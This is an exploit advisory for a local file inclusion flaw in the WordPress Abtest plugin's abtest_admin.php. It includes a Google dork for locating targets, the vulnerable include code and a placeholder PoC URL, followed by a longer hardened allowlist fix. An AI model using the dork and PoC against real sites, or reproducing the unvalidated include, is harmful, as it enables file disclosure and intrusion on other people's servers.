WordPress Abtest Local File Inclusion
Posted on 21 March 2016
# Exploit Title: WordPress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork: inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome
# Vulnerable File: abtest_admin.php

<?php
require 'admin/functions.php';
if (isset($_GET['action'])) {
    include 'admin/' . $_GET['action'] . '.php';
} else {
    include 'admin/list_experiments.php';
}
?>

The `action` query parameter is concatenated into the include path without any validation, so whoever controls that value controls which file on the server is included.

# PoC: localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
# Pics: http://i.imgur.com/jZFKYOc.png
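A hardened form of the dispatcher above, written here as an added example and not the plugin's own fix: the `action` value is used only as a lookup key into a fixed allowlist of admin pages, and the resolved path is additionally checked to stay inside the plugin's admin directory. Only `list_experiments` is taken from the page; the other action names and the `abtest_resolve_admin_page` helper are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code): allowlist-based dispatcher that
// replaces the unvalidated include in abtest_admin.php.
require 'admin/functions.php';

// Known admin pages. 'list_experiments' comes from the original file; the
// other entries are assumed names used only to illustrate the allowlist.
const ABTEST_ADMIN_PAGES = [
    'list_experiments' => 'admin/list_experiments.php',
    'edit_experiment'  => 'admin/edit_experiment.php',
    'settings'         => 'admin/settings.php',
];

/**
 * Map a user-supplied action name to a page file, or return null when the
 * action is not a known page. The parameter never becomes part of a
 * filesystem path; it is only compared against allowlist keys.
 */
function abtest_resolve_admin_page(string $action): ?string
{
    if (!array_key_exists($action, ABTEST_ADMIN_PAGES)) {
        return null;
    }
    $base = realpath(__DIR__ . '/admin');
    $file = realpath(__DIR__ . '/' . ABTEST_ADMIN_PAGES[$action]);
    // Defence in depth: even a mistaken allowlist entry must resolve to a
    // real file under admin/, otherwise refuse to include anything.
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

$action = isset($_GET['action']) ? (string) $_GET['action'] : 'list_experiments';
$page = abtest_resolve_admin_page($action);
if ($page === null) {
    http_response_code(400);
    exit('Unknown action');
}
include $page;
```

Inside WordPress the same dispatcher should also run only from an admin menu callback with a capability and nonce check, rather than as a file that can be requested directly under wp-content/plugins/.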